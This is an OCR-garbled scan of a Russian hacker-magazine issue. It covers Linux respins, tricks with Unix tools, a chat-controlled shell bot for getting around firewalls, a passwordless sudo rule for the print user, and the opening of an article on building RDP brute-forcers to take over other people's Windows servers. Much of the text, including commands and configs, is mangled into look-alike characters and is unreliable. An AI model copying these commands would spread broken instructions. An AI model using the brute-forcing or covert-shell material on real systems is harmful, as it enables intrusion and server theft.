для создания респина не требуется ЫѵеСО, все пакеты будут 
скачаны из инета. 

Пеѵізогесть в стандартном репозитории Ребога, начиная 
с седьмой версии, поэтому установка не должна вызвать 
сложностей: 



# ушп іпзкаіі Ііѵессб-Сооіз зріп-кіскзкагкз 
ІІОп-кіскзкагкз 

Чем создавать с нуля свой конфиг, проще взять готовый и 
немного его подредактировать. Готовые конфиги лежат в 
/изг/зЬаге/зріп-кіскзІагІъ. Создается ЫѵеСО из конфига 
следующим образом: 

# Ііѵессб-сгеаког --соп:Еід=/изг/зЪ.аге/ 
зріп-кіскзкагкз/кесіога-ііѵессі-сіезккор . кз 
--^з1аЬе1=Ре<іога-ЬіѵеСВ --сасЪ.е=/ѵаг/ саске/ 
Ііѵе 




> ІПІО 

РРА (Регзопаі 
Раскадез Агсбіѵе] 

— персональный 
репозиторий для 
ІЭбипіи, расположен- 
ный на сайте Шр:// 
Іаипсбраб.пеі компа- 
нии Сапопісаі. 



# уит іпзкаіі геѵізог 



Все необходимые пакеты также будут скачаны из инета. 



Для нормальной работы как Реѵізог, так и Ыѵесб-сгеаЬг 
лучше перевести ЭЕЫпих в разрешающий режим: 

# зекепкогсе О 

Для запуска Реѵізог нужны рутовые привилегии. На первом 
шаге мастера предлагается выбрать тип респина (СО/ОѴО 
инсталлятор и/или ЫѵеСО]. Второй шаг— выбор собираемой 
модели. Тут надо немного пояснить: в основном конфигура- 
ционном файле/еЫ/геѵізог/геѵізог.соЫ описаны «Модели» 
(специальные секции в конфиге, содержащие особенности 
сборки той или иной версии Ребога). Основная характе- 
ристика конкретной модели — репозитории, откуда будут 
скачаны пакеты. По умолчанию, Реѵізог в Ребога 12 может 
собрать модели Ребога 12 и Ребога Раѵѵбібе для архитектур 
х86, х86-64 и РРС. Добавляя описание моделей в конфиг, 
можно научить Реѵізогсобирать, например, Ребога 1 1 и 
Ребога 13. На следующем шаге можноуказать кіскзЫН-файл 
и выбрать, какие секции из него использовать. Четвертый 
шаг— выбор ПО. И воттут меня ждала неприятность: список 
пакетов отказался выстраиваться в группы, поэтому пакеты 
пришлось выбирать из большого общего списка (долго, и 
есть нехилая вероятность забыть что-нибудь нужное]. Види- 
мо, неисправленный баг в Реѵізог, что, в принципе, неудиви- 
тельно — проект давно не развивался (последняя версия 
вышла аж в декабре 2007]. После выбора пакетов покажется 
короткая статистка (количество пакетов, объем для загрузки, 
объем в установленном виде]. Следующие шаги — настрой- 
ка сети, задание параметров загрузки ядра, параметры 
аутентификации, настройка файрвола, ЗЕЫіпих, X ѴѴіпбоѵѵ 
и создание пользователя. По окончании настройки Реѵізог 
скачает все выбранные пакеты из инета и начнет сборку. Вся 
эта процедура у меня на виртуальной машине заняла около 
получаса. Ыѵесб-сгеаіюг — менее капризный и более гибкий, 
но не совсем интуитивно понятный инструмент. Этатулза 
создает ЫіѵеСО, основываясь на конфигурационном файле, 
синтаксис которого совпадаете кіскзЫгР 
Установка Ііѵесб-сгеаіог (входит в состав Ііѵесб-Іюоіз]: 



ІІ5ЕКРКІЕМ0І.Ѵ 6ЕЫТ00 

Легко построитьсвой респин можно даже на базе бепіюо, 
причем всего за несколько шагов. Только для этого надо 
воспользоваться специальным средством Саісиіаіе Ыіпих 
ЗсгаІсЬ (СЫ5] . СР5 — это полностью совместимый с бепіюо 
дистрибутив, предназначенный для создания собственных 
РіѵеСО/РіѵеІІЭВ. Кроме базовой версии с ОрепВох, есть 
также версия с Опоте (СР56]. Чтобы воспользоваться СР5, 
надо выбрать в меню загрузки РіѵеСО пункт В и і 16 е г. Загру- 
зится обычная на первый взгляд Ріѵе-система, в которой 
потом можно будет тестировать внесенные изменения. 

Для того чтобы перейти непосредственно к сборке, следует 
ввести: 

# с1-Ьиі1сіег 

После выполнения команды цвет приглашения изменится 
на коричневый и выполнится сЬгооІ в/тпі/биіібег, где и 
будет происходить сборка. В этом режиме можно устанав- 
ливать, обновлять, удалять программы без каких-либо 
ограничений. После того как все необходимые изменения 
внесены, можно выйти из режима сборки (набрав ехб или 
<СМ+0>] и протестировать изменения в Ріѵе-системе. Если 
все устраивает, то можно запустить сборку своего РіѵеСО: 

# саісиіаке --ізо 

Образ будет создан в/изг/саІсиІаІю/зНаге/Ііпих. Если ОЗУ не 
достаточно, то на этом этапе все может обломиться, поэтому 
рекомендую заранее подмонтировать к этому каталогу 
какой-нибудь более-менее емкий гѵѵ-носитель. 

НАРРУ ЕЫО 

Практически для каждого популярного дистрибутива можно 
найти удобное средство для создания респина: будьто веб 
или локальное приложение. Но какбы то ни было, ничто не 
даст столько экспы в этой области, каксборка Ріпихітопп 
5сгаІсЬ...зс 
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Использование стандартных утилит 
для решения нестандартных задач 




Приверженцы ІІЫІХ-систем не просто пользователи, это люди с пытли- 
вым умом, любовью к велосипедостроен ию и непреодолимым желанием 
доказать свою гиковость. Они готовы потратить не один час свободного 
времени, чтобы найти нетривиальное решение простой проблемы или 
доказательство возможности ее решения с помощью не предназначен- 
ных для этого средств. И все это ради удовольствия. 



НТТР-СЕРВЕР 
СВОИМИ РУКАМИ 

Миниатюрный НТТР-сервер, собранный из подруч- 
ных компонентов, остается одной из самых люби- 
мыхтем современных гиков. Они готовы написать 
его буквально на всем, начиная от простого исполь- 
зования команды пеісаі: на 80-порту и закачивая 
языком РозЙсгірб используемым для форматиро- 
вания текста перед выводом на принтер. Блоггер 
по имени Алексей Свечников взялся за этуте му и 
написал НТТР-сервер на Ьазб размером всего 222 
байта [ЬДрУ/аІехеѵ.зѵезбпікоѵ.ги/ЫодАЮОб/І 2/23/ 
Ы:1:р-сервер-размером-в-222-байта/ ). Сначала вся 
идея сводилась к горячо любимому 1)І\ІІХ-адм и на- 
ми рудиментарному серверу с использованием пс, 
пример которого приведен ниже: 

зегѵег$ пс -1 -р 8080 < Тііе 

с1іепС$ х-ѵллм-Ъгсжзег 

Ы:Ср://192. 168. 0.1:8080 

Нозатем пример обросфункционалом и пре- 
вратился в НТТР-сервер, способный отдавать 



файлы позапросу и списокфайловтекущего 
каталога. Ниже приведена переработанная 
версия скрипта Алексея, которая корректно 
работаете доодіе сбготе и избавлена от бага 
с файлами, имеющими в названии символы в 
верхнем регистре: 

$ \УЫ1е Сгие; сіо пс -ѵѵ -1 -р 8080 -с 
' ( геасі а Ь с; Ті1е='есТю $Ъ I зесі ’ з/ 
[^а-т.А-7,0-9 . ] / /д 1 ' ; ІТ [ а$Ті1е = "а" 

] ; Ытеп 1з -1; еізе саС $Ті1е; Ті ) ’ ; 
зіеер 1; сіопе 

Все это одна команда. Сервер отдает файлы 
текущего каталога, для запроса списка которых 
достаточно просто обратиться к корневому ката- 
логу. После выбора файла добавляем его имя в 
адресную строку и благополучно скачиваем на 
свою машину. Некоторое время спустя Алексей 
реализовал более продвинутую версию сервера, 
которая умеет отдавать НТТР-заголовки (а для 
файлов вместе с размером и МІМЕ-типом], 
обрабатываетошибку404 и отдает полноценный 



іпсІех.ЫітІ. Ее однострочный оригинал и развер- 
нутый вариант, удобный для чтения и анализа, 
ты найдешь на прилагаемом кжурналу диске. 
Еще более гиковый вариант НТТР-сервера име- 
ется на страничке Магбп А. ОосПзсб. Он пошел 
дальше всех остальных и воспользовался для 
написания сервера не каким-нибудь Ьазб или 
аѵѵк, а языком программирования РозіБсгірІ:, 
который был разработан Аб обе Бузует з для 
описания сложных графических объектов и 
подготовки печатных изданий. Исходный текст 
сервера слишком велик, чтобы продемонстри- 
ровать его на страницахжурнала, ноты можешь 
получитьего, обратившись кстраничке ЬЦр:// 
реорІе.сІеЫап.огд/~досІІ5сб/р5бЦрсІ или заглянув 
внутрь нашего диска. 

ДЕМОН ЗАКАЧЕК 
НАБАЗЕСІІР5 

Менеджер печати СІІР5, ставший стандартом 
в ІЛХІХ-системах, обладает несколькими очень 
привлекательными характеристиками, которые 
позволяют использовать его в качестве менеджера 



► 092 



ХАКЕР 05 /136/ 10 





Гг /1 




\ - / 



ОропВвС кеЕегспсе Мгщиаі 



аийіо зегѵег апсі зсгеат тапіриІаЕІоп Еооі 



ТОР5ІЗ 

аисаЕ [-Іпи] (-Ъ пЕгатез ] [-С тіп:тах] [-с щ 

[-Ь ЕшЬ ] [-і Еііе] [~ш шогііе ] [-о ЕІІе Т 

( -ѵ ѵо 1 иліе ] |-х роіісу ] 



с тіп:іпах] [~е еле) (-Е сіеѵісе) 
1е ] [-Е гаЕе] [ -з зоскеЩ 







. ПкіІгѴ ШІЛІ ,1. |ЯІ. 

Гчп*-: ѵякі і-фй гОги"чЯ 

Виртуальные принтеры с сѵѵаеі-бэкендом 

любых очередей, к которым необходим удаленный доступ и 
расстановка приоритетов. Если в твоем распоряжении имеется 
машина, которую ты собираешься использовать для закачки 
файлов, то СИР5 позволитей справиться с этой задачей без 
необходимости установки дополнительного софта и танцев с 
бубном. Алгоритм действий по превращению СІІР5 в демон 
закачекследующий: 

1. Для начала напишем скрипт сѵѵдеТзб, который будет 
осуществлять закачку файлов и вызываться приведенным 
ниже СІІРЗ-бэкендом: 

$ зисіо ѵі /изг/ІосаІ/зЬіп/сѵѵдеІ.БИ 

# ! /Ъіп/зЪ. 

Е>ОШЬОАВ_ВІК= $ 1 
ССІ 

тксііг -р " $ВОШЬОАВ_ВІВ" 
ссІ " $ВОШЕОАВ_ВІК" 

/изг/Ьіп/ѵгдеВ -пс -і " $ 2 " >/сіеѵ/пи 11 2>&1 

Сделаем его исполняемым: 



КІРТЮН 

ТЪе аисаЕ иЕіІіЕу сап гесоіЩ опе іприс зЕгеат аші зЕоге ІЕ оп тоІЕірІе 
гіезЕіпаЕіоп Еііез, ^оіпд ЕЬе песеззагу сопѵегзіопз оп ЕЪе Сіу* ІЕ сап 
ріау, сопѵегЕ, апсі тія тиІЕірІе іприЕ Еііея зішиІЕапеоизІу, апгі сап аізо 
асе аз ап аи<Но зегѵег* аисае аізо Ъаз а Іедасу тойе ЕЪаЕ могкз Ііке 
ргеѵіоиз ѵегзіопз о Е аисаЕ, мЫсЬ сЬез поЕ сопѵегЕ оп Е^е Сіу ап<3 зир- 
рогЕа рІауЬаск оС ,аи Сііез. 

ТЬе орЕіопз ате аз Еоііоѵз: 

-Ь пЕгагаез 

ТЪе ЬиССег зіге іп Егаліез. А Егаше сопзізЕз оЕ опе зашріе Сое 
еасП сПаппе! іп ЕПе зЕгеат. ТПіз із ЕПе пишЬег оЕ Егашез ЕЪаЕ 



/изЕ/здаге/тап/саЕ1/аисаЕ . О 9% 

Справочная страница аисаіИ) 

запуска скрипта сѵѵдекзб с рутовыми полномочиями, 
разрешим пользователю Ір, с правами которого запускаются 
СЦРЗ-задания, делать это без запроса пароля: 




Гкіпь 



1 НТТР://ѴѴѴѴѴУІ 



$зис1оѵІ5ис1о 

Ір АЬЬ= ( АЬЬ) ЮРА 83 Ш: /изг/ 1 оса 1 /зЬіп/ 
емдек . зЪ. 

4. Настроим несколько принтеров через ѵѵеЬ-интерфейс, 
указав в качестве их бэкенда сѵѵдеі: (смотри скриншот«Вир- 
туальные принтеры с сѵѵдеі-бэкендом») и объединим их в 
класс, чтобы получить возможность одновременной закачки 
более чем одного файла (смотри скриншот«Объединяем 
виртуальные принтеры в класс»]. 

5. Все, теперь можно отсылать задания (ІІПІ_] на виртуальный 
принтер. Сделать это можно, например, так: 

$ есііо ' ііВДр : //кегпеі .огд/риЬ/Ііпих/кегпеІ/ 
ѵ 2 . 6 / 1 іпих- 2 . 6 . 33 . Ваг . Ьг 2 ' I Ірг -Ррсмдек 



Т 

> Ііпкз 

• Компилятор Ассем- 
блера на Ьазб: 
ЬирУ/зІазМоСогд/ 

а гЕісІез/0 1 /02/ 
15/046242.зЫтІ 

• Использование 
спулера печати для 
воспроизведения 
трЗ-файлов: 

ѵѵѵѵѵѵ.хакер. 
ги/тадагіпе/ 
ха/062/1 10/1 .азр 



$ зисЬэ сЬшосі +х /изг/ІосаІ/зЪіп/смдек . зЪ. 

2. Теперь создадим специальный СИРЗ-бэкенд, который 
будет принимать добавленные в очередь ІІПІ_ и отдавать их 
вышеописанному скрипту: 

$ зисіо ѵі /изг/ІіЬ/сирз/ЬаскепсІ/сѵѵдеІ 

! /Ьіп/зЬ. 

ік [ $# -ед 0 ] ; ккеп 

есііо ' сирзмдек "Шкпоші" "Сирз члгдек 
сіоѵтіоасіег " 1 
ехік О 
кі 

# Каталог для закачек 
ВОШЬОАВ_ВІК=/ѵаг/ктр 

итазк О 

ТМРРІЬЕ=/ктр/ смдек$$ 
сак "$ 6 М > $ТМРЕІЬЕ 
/Ъіп/скшосі + г $ТМРЕІЬЕ 

/изг/Ьіп/зисіо -Н -и $2 /изг/ІосаІ/зЪіп/смдек . 
зЬ " $ВОШЬОАВ_ВІК м " $ТМРРІЬЕ" 
гш /ктр/смдек$$ 



ОРЕЫВЗй И БЕЗОПАСНЫЙ ГОЛОСО- 
ВОЙ ЧАТ ИЗ КОРОБКИ 

Ореп'овская утилита аисаі, изначально созданная для про- 
игрывания «сырых» звуковых файлов с расширением .а и, 
со временем обросла функциональностью и сегодня может 
использоваться для многих целей, включая различные пре- 
образования звукового потока в режиме реального времени, 
атакже возможность применения в качестве полноценного 
аудиосервера, способного смешиватьзвуковые потоки, 
порождаемые другими инстанциями аисак Известный в 
ОрепВЗЦ-кругаххакер по имени Райан Флэнири восполь- 
зовался этой возможностью для создания простой системы 
голосового чата, нетребующей установки какого-либо 
дополнительного ПО. Идея, положенная в ее основу, такова: 

1. Запустить аисаі в режиме сервера на двух удаленных 
машинах. Работая в режиме сервера, аисаі подключится куст- 
ройствам ввода и вывода звука и создаст II N IX- со кет, чтение из 
которого приведет к чтению данных изустройства ввода (мик- 
рофон], а запись— кзаписи в устройство вывода (колонки]. 

2. Запустить второй процесс аисаі в обычном режиме на 
первой машине и перенаправитьего вывод процессу аисаЕ 
работающему на второй машине с помощью ззб. В результа- 
те входной поток, полученный с микрофона и направленный 
сервером аисаі в ІЛЧІХ-сокет, будет прочитан аисаі-про- 




РозЕЗсгі рЕ — язык 
описания страниц. 
Предназначен для 
формирования изоб- 
ражений произволь- 
ной сложности 
и вывода их на 
печать. 



Дадим ему права на исполнение: 

$ зисіо сЬшосі +х /изг/ІіЬ/сирз/Ьаскепсі/сѵ^дек 
3. Чтобы позволить коду бэкенда использовать зибо для 



цессом и перенаправлен на удаленную машину, где его 
прочитаетудаленный аисаі-процесс и запишет в ІЛЧІХ-сокет 
собственного аисаі-сервера. Такзвукс микрофона первой 
машины попадетв колонки второй. 

3. Повторить шаг 2 на второй машине, чтобы создать обрат- 
ную связь. 
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Объединяем виртуальные принтеры в класс 



На уровне командной строки все это выглядиттак: 

изег1@іюзБ1> аисак -1 
изег1@іюзк1> аисак -о - I ззЪ \ 
изег1@іюзк2 аисак -і - 
изег2@кюзк2> аисак -1 
изег2@кюзк2> аисак -о - I ззЪ. \ 
изег2@іюзк1 аисак -і - 

Однако именно втаком виде система не 
заведется. Оказывается, работая в серверном 
режиме, аисаі привязывает создаваемый Ю N IX- 
сокеткзапустившемуего пользователю (файл 
получает имя Дтр/аисаІъЮ-юзера/беІъи Іі], и 
когда клиентский процесс аисаі: подключается 
к серверу, он также использует Ю текущего 
пользователя для обращения к сокету. Чтобы 
работать совместно, сервер и клиентаисаі 
должны бытьзапущены одним пользователем. 

В приведенном выше примере клиентаисаГ 
запускаемый на машине Ьоз1;2 с помощью ззб, 
будет работать с правами пользователя изегі, 
тогда как сервер на этой машине будетзапущен 
с правами пользователя изег2, поэтомузвукдо 
второй машины «не дойдет». Для этого, можно 
либо использовать аккаунты с одинаковым Ю 
пользователя на обеих машинах, либо пойти 
на небольшой трюк и послезапуска сервера 
создать ссылку на каталогДтр/аисаі-Ю-юзера 
для другого пользователя. Вот как это сделать на 
обеих машинах: 

и1@Ы> изег1_БІБ= ' ісі -иг изегі 1 
и1@Ы> изег2_БІБ= ' ісі -иг изег2 1 
и1@Ъ.1> аисак -1; с<5. /Стр/ 
и1@Ъ.1> сктосі 755 аисаС-$изег1_ІЛБ 
и1@Ъ.1> 1п -з аисак- $изег1_Ш0 аисак- 
$изег2_БІБ 

и2@к2> изег2_ІЛБ= 1 ісі -иг изег2 1 
и2@Ъ2> изег1_ІЛБ= ' ісі -иг изегі 1 
и2@Ъ2> аисак -1; ссі /Стр/ 
и2@Ь.2> сЪтосі 755 аисаС-$изег2_ІЛБ 
и2@Ъ.2> 1п -з аисаС-$изег2_1ЛБ аисак - 
$изег1_БІБ 

Затем можно запускать перенаправле- 
ние звука. Райан предостерегает, что по 
умолчанию ты получишь слишком бол ь- 
шую задержку, и рекомендует установить 
минимальный размер буфера и снизить 
частоту дискретизации звукового потока до 
11000 Гц: 

изег1@СюзС1> аисаС -Ъ 1 -г 11000 -о - \ 

I ззЪ. изег1@СюзС2 аисаС -Ъ 1 \ 

-г 11000 -і - 



ВИДЕОПАМЯТЬ КАК СВОП 

Современные графические адаптеры оснаща- 
ются внушительным объемом высокоскорос- 
тной памяти, большая часть которой остается 
незадействованной во время обычной работы 
с системой. Ядро І_іпих позволяет использовать 
эту память для своих нужд, зарезервировав 
небольшой ее объем для стандартных ѴЕ5А- 
режимов, а все остальное использовать для 
хранения файлов или создания своп-раздела. 
Проделать та кое можно с помощью специ- 
ального драйвера под названием Метогу 
Тесбпоіоду Оеѵісе (МТО), позволяющего адресо- 
вать нетолько оперативную память, но и память 
любого устройства, подключенного через шину 
РСІ. Вся методика сводится кактивации драй- 
вера в ядре, выяснению адресного пространс- 
тва видеопамяти и ее отображения в адресное 
пространство ядра. Итак, для начала активиру- 
ем драйвер в ядре, для этого запустим «таке 
теписопбд», перейдем в раздел Оеѵісе Огіѵегз 
и активируем следующие пункты меню: 

$ зисіо таке теписопТід 

Беѵісе Бгіѵегз > 

<М> Метогу Тескпоіоду Беѵісе (МТБ) 
зиррогк > 

<М> Бігеск сЪаг сіеѵісе ассезз Со 
МТБ сіеѵісез 

<М> Соттоп іпкегкасе Со Ыоск 
Іауег ког МТБ 1 кгапзіакіоп Іауегз 

<М> СасМпд Ыоск сіеѵісе ассезз 
ко МТБ сіеѵісез 

Зеік-сопкаіпесі МТБ сіеѵісе 

сігіѵегз > 

<М> РЪузісаІ зузкет НАМ 

Теперь необходимо найти видеопамять в 
адресном пространстве шины РСІ. Для этого 
воспользуемся утилитой Ізрсі и найдем графи- 
ческий адаптер: 

$ Ізрсі I дгер ѴСА 

Выводдолжен выглядеть примернотак: 

02:00.0 ѴСА сотраЫЫе сопкгоііег: 
пѴісііа Согрогакіоп БѴ3 5 [СеРогсе РХ 
5900ХТ] (геѵаі) 

Узнаем детальную информацию о карточке: 

$ ізрсі -ѵѵѵ -з 02:00.0 

Видеопамять разделена на несколько регионов, 
один из которых помечен какргеІюкЪеЫе. Это и 



5ЕР ЗокоЬап - ІЕѴЕІ 1 





[Ьдк1:я:г:2:дЫ1 



Реализация игры сокобан на 5ЕР 





5соге:40 

а г ир - гоіаіе 
"а" ог ІеТк - Іекк 
"<Г ог гідрк - гідМ: 

"з" о г йоип - опе 5іер сіоѵ/п 
"г" ог Брасе - сі гор сіоип 



Реализация тетриса на 8 ЕР 



естьосновное место хранения изображений, фор- 
мируемых адаптером для вывода на экран (буфер 
кадров], а также для хранения промежуточных 
результатов обработки 30-изображений. Про- 
ведя небольшие расчеты, мы можем выяснить, 
какая ее часть используется под буфер кадров, 
необходимый для вывода 20-картинки на экран 
(которой мы пожертвовать не можем, не потеряв 
возможность работать с графикой], а какая приме- 
няется только для расчетов в режиме 30 и потому 
можетбыть использована нами. Изображение, 
хранимое в буфере кадров, представляет со бой 
двумерный массив, размер которого соответству- 
ет используемому разрешен ию экрана, а размер 
каждого элемента равен глубине цвета. Поэтому 
при разрешении экрана 1024x768(932 для хране- 
ния изображения будетзадействовано 1024* 768 
*4 = 3145728байт(32бита = 4байта] илиЗ Мб. Как 
и любой другой процессор, видеочип адресует па- 
мять отее начала, поэтому, чтобы получить доступ 
к видеопамяти, не задев при этом буфер кадров, 
мы должны отобразить память не отее начала, а с 
точки, расположенной за этими самымитремя ме- 
габайтами (а лучше сразу за восемью для надеж- 
ности и поддержки более высоких разрешений]. 
Берем из вывода приведенной выше команды 
(зрсі адрес рге1ю1:сЬеЫ.е-региона видеопамяти. 

Он указан после словосочетания «Метогу аі» и в 
нашем примере составляет еООООООО. Переводим 
8 Мб в шестнадцатиричную систему счисления 
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и получаем 800000. Прибавляем это число кадресу региона и получаем 
е0800000. Далее выходим из иксов и подгружаем модуль рЬгат, передав 
ему в качестве аргументов этот адрес и размер региона (если адаптер осна- 
щен 128 Мб памяти, то размер за вычетом 8 Мб будет равен 120 Мб): 

$ зисіо тосІргоЬе ріігат ркгат=ѴКАМ , 0хе0800000 ,12 ОМі 

Проверяем наличие псевдоустройства МТО: 

$ саб /ргос/тбб 

В выводе должен быть указан размерустройства, начало адресуемой им 
памяти и его имя. Если все в порядке, загружаем модуль птЬсІЫоск, кото- 
рый превратит псевдоустройство /беѵ/тШ в блочное устройство 
/беѵ/тісІЬІоскО: 

$ зисіо тосІргоЬе тббЫоск 

Это все, теперь на устройстве можно создать своп : 

$ зисіо ткзмар /беѵ/тббЫоскО 
$ зисіо змароп /беѵ/тббЫоскО 

Или файловую систему: 

$ зибо ткбз . ехб2 /беѵ/тббЫоскО 

Чтобы не обрушить иксы, открой конфигМс/ХІ і/хогд.сопі'и вставь в 
секцию Оеѵісе строку Пгіѵег'ѵеза". 

ТЕТРИС, АРКАНОИД 
И СОКОБАН ИЗ РЕДАКТОРА 

Потоковый редактор 5ЕБ (Зітеат ЕОіТог] , существующий в ІЛЧІХс начала 
времен и предназначенный для потокового неинтерактивного редакти- 
рования текстов с помощьюуправляющих команд, оказался настолько 
мощным инструментом, что с его помощью можно нетолько выполнять 
сложнейшее редактирование текста, но даже написать полноценное 
приложение или целую игру. Наверное, все слышали облетевшую многие 
ІЛЧІХ-сайты и блоги историю отом, какдевушка по имени Юля написала 
самый настоящий тетрис, используя только редактор 5ЕБ и небольшой 
скрипт-обертку ( Ьбр ://и и пег. [іѵе]оигпа1..сот/55238.Ыпп[ ]. Трудно сказать, 
что побудило ее на эту странность, однако содержащийся в представлен- 
ных файлах код взрывает голову, начиная уже с первых строк, и говорит о 
незаурядном мышлении и превосходном знании редактора. 

Однако, как бы это не било по гордости за родную отчизну, на официаль- 
ном сайте редактора ( ЬбрТ/зесІ.зоигсеІюгде.пеі ) подобных игр насчитыва- 
ется аж 1 1 штук, среди которых можно найти такую классику как сокобан и 
арканоид, работающий в пошаговом режиме. Аесли промотать ниже, то 
найдешьдаже модуль для Арасбе, позволяющий исполнятьЭЕБ-сцена- 
рии внутри ѵѵеЬ-сервера. 

МВВЕК ВМЕСТО 55Н 

Возможность воспользоваться полноценным 55Н-доступом есть далеко 
не всегда. Машина может находиться за файерволом, который режет 
22-й порт, или входить в частную сеть с доступом в интер нет только через 
ЫАТ. Приходится включатьтворческое мышление, и первое, что прихо- 
дит в голову — написать простой ]аЬЬег-бот, который будет подключаться 
к]аЬЬег-серверу, слушать вводимые другим пользователем команды 
и выполнять в окружении операционной системы. Немного поискав в 
Сети, мы обнаружим, что идея не нова, и некоторые люди уже пробовали 
создать нечто подобное. Мне понравилась реализация, написанная 
командой са йта ѵуѵуѵу. ѵІзоНуѵа ге . со т . Наибольшая ее ценность в просто- 
те исходника бота, который легко понять и модифицировать для своих 
нужд. 

Скачав архив, распаковываем его и создаем конфигурационный файл: 

$ мдеб у1зоббмаге.сот/заЪЪег-зке11-20090303 .баг.Ъг2 



* ■* 03:в<М 

В2:6В.Ѳ У6А смрагіЫ* СИІТ гйП*г: пѵійіа СОгрпгаІкт №35 [№йКІ РХ 59ВЫТ] [№ лі] 

СапікЯ: 1/0* Н#»+ Ви*НййТ*г‘* Н*ШІ№- ѴбАЗлмр- РДгЕгг- ЗіДрріпд- 5ЕНН- РйіГВ2і- СИНГЛя - 

Сар* И№* иор- РМТЙ2Н+- РагЕгг- ОЕУ5Е1_^«Ш* ^ТЫигт- сТЛЫн-т- *ЗіНЯ- «яня- ІНГх- 

240 \ 12ИПІ аіл, 25Ѳпа ык> 

Іпі*ггѵри ріл А гоисай се ]В(? 19 

р*оіоп ммгу «эвеем ізг-ыи гют-ргв^игівіЛві івія-іен] 

гпа^і кал гг д 

СдраЬШЧм: **еі*а4 
КаітаП. йгіѵйг іп им: пмійіа 
Кагмі пмШІа, пѵШІаТЬ 

Находим ргеіеісЬаЫ.е-регион памяти в выводе Іэрсі 



$ Саг -хзб заЪЪег-зііеІІ-20090303 . баг .622 

$ѵі -Ѵ.іаЬЬег-зИеІІ 

< 

# Сервер и порт 
’зегѵег' => ' заЬЪег.ги', 

1 рогб ' => * 5222 ' , 

# Учетная запись пользователя, используемая ботом 
’изегпате' => 1 з аЪЪег-зкеІІ 1 , 

' раззѵтогб' => 1 раззчлгогб' , 

# Ресурс бота 

1 гезоигсе' => ' з аЬЬег-зкеІІ ' , 

# ДО админов 

' абтіпз 1 => 1 абтіпІШіозб . сот абтіп2@Ъ.озб . ги ' , 

) 

Бот регистрируется на сервере под отдельным Д Сом (который придется 
завести заранее] и принимает команды только от пользователей, пере- 
численных в опции абтіпз. 

Теперь можно уста но вить зависимости в виде пакетов регі, ІіЬпеСхтрр- 
регіи ІіЬпеІщаЬЬег-регІ и запустить бота: 

$ . /заЪЬег-зііеІІ .рі & 

Сообщения отзапускаемыхтобой команд будут приходить в ответных 
сообщениях. 

ѴѴЕВ-КАМЕРА В КАЧЕСТВЕ МЫШИ 

Введя в адресной строке браузера строку ѵѵѵѵѵѵ.ѵоиІиЬе.сопп/ѵѵаІсб?ѵ=ЕС 
НІЮК21 : А8&1 : еаІиге=р[аѵег етбеббеб . ты сможешь увидеть видеоролик, 
демонстрирующий работу небольшого рубзоп-скрипта, позволяющего уп- 
равлять курсором мыши с помощью любых объектов, находящихся взоне 
видимости ѵѵеб-ка меры. На нашем дискеты найдешь скрипт, который 
п оз в о л я ет это д е л ать . 

Для его запуска потребуется установить пакеты стаке, рубзоп, руіЬоп-хІіЬ, 
а также самый важный компонент — библиотеку компьютерного зрения 
ОрепСѴ ( ЬДрУ/орепсу.зЕпеЧ . Ее нет в большинстве дистрибутивов, поэто- 
му придется собрать самостоятельно: 

$ баг -хз б ОрепСѴ-2 .0.0. баг . Ъг2 
$ сб ОрепСѴ-2 .0.0 
$ ткбіг геіеазе; сб геіеазе 
$ стаке -Б СМАКЕ_ВБІЬБ_ТУРЕ=КЕЬЕА8Е \ 

-Б СМАКЕ_ШЗТАЬЬ_РКЕРІХ=/изг/1оса1 \ 

-Б ВБІББ_РУТНСЖ_8БРРОКТ=СЖ . . 

$ зибо таке іпзбаіі 

После установки всех компонентов просто запусти сат-тоизе-сМ.ру, иты 
сможешь проделать трюк, показанный в ролике. 

А ЧТО СДЕЛАЛ ТЫ? 

Все описанные в статье приемы были придуманы такими же юниксоида- 
ми, какты. Если втвоей голове есть другие интересные идеи нестандар- 
тного использования программ или даже их полноценные реализации 
— смело шли их мне, и если они окажутся достойны внимания, мы опишем 
их в одной из ближайших статей (не забыв о копирайтах :].^с 
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СВЕЖИЙ ПОДХОД К ПРОГРАММИРОВАНИЮ 
РОР-БРУТФОРСЕРОВ 

В наши дни только ленивый не пробовал брутить дедики - благо, тулз 
для этого дела написано предостаточно. Наиболее известны 1$$-Ьш- 
іе от шеіаі и АсІіѵеХ-Ьазеб брутфорсы, начало эволюции которых 
положили мы с Оіпт в прошлом году. Все остальные брутфорсы 
базируются на этих двух - являясь фронт-эндами Ізз-Ьгиіе (КОР Вги- 
іе Ьу Ш и) или клонами моего К&й Р Вгиіе. В этом году я нашел новый 
способ угона серверов на №пбоѵѵ$. Хочешь узнать, как - читай дальше! 



СУЩЕСТВУЮЩИЕ РЕШЕНИЯ 

Казалось бы, все хорошо — уйма брутфорсов, выбирай-не хочу, но все 
они не лишены недостатков. 

• Брутфорс от теіаі’а — один большой «костыль» (хотя автору громад- 
ный респект за проделанную работу]. Пароль в нем вводится путем 
эмуляции нажатий на кнопки, к тому же он зависит от версии тзізс. 
ехе. 

• АсбѵеХ-Ьазеб брутфорсы характеризуются самим словом «АсІіѵеХ» 

— эта технология ну никак не подходит для создания подобного софта. 
Брутфорс — опять же костыль на костыле, например, чтобы нормально 
подбирался пароль, приходится создавать п объектов на форме, где 

п равно количеству потоков. Причем делать объекты невидимыми 
нельзя — тогда подбор пароля перестает работать (чтобы окошечки 
не было видно, их приходится прятать за границы формы!]. Еще один, 
самый большой минус — он ни в какую не хочет работать на ѴѴіпсІоѵѵз 
Зегѵег 2003, а ведь большинство дедиков работает именно на этой ОС. 



Итак, сегодня я расскажу тебе, как мне удалось написать брутфорс, 
который работает на любой ОС семейства ѴѴіпсІоѵѵз І\ІТ, при этом не 
используя никаких внешних компонентов — фактически работая 
прямо с протоколом НБР версии 5! 

РАЗБОР ПОЛЕТОВ 

Осенью 2009 года я серьезно задумался над написанием нового брут- 
форса. Я начал искать документацию по протоколу ПОР, и, само собой, 
ничего не нашел. И тогда я вспомнил, что существует такой проект, 
как гсіезкіор — ПОР-клиент под никсы, работающий с Х-сервером и 
умеющий автоматически вводить логин и пароль. Я скачал исходники 
и принялся их изучать. Взять и просто скопировать несколько функ- 
ций невозможно из-за своеобразной структуры программы, поэтому я 
решил переписать их в нужном мне виде. Потратив примерно неделю, 
я забил на это дело. Через некоторое время один мой иностранный 
знакомый, заинтересованный в написании мною хорошего брутфорса, 
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Главный виджет брута в 01 Сгеаіог 



ада. 



скинул мне интересную информацию — патч, превращаю- 
щий гбезкіор в брутфорс. Вроде бы, вот оно, счастье, да 
не тут-то было! Брут получался однопоточным, по спи- 
ску паролей, и работал он только под линуксом, что нас 
совсем не устраивало. В очередной раз на проект было 
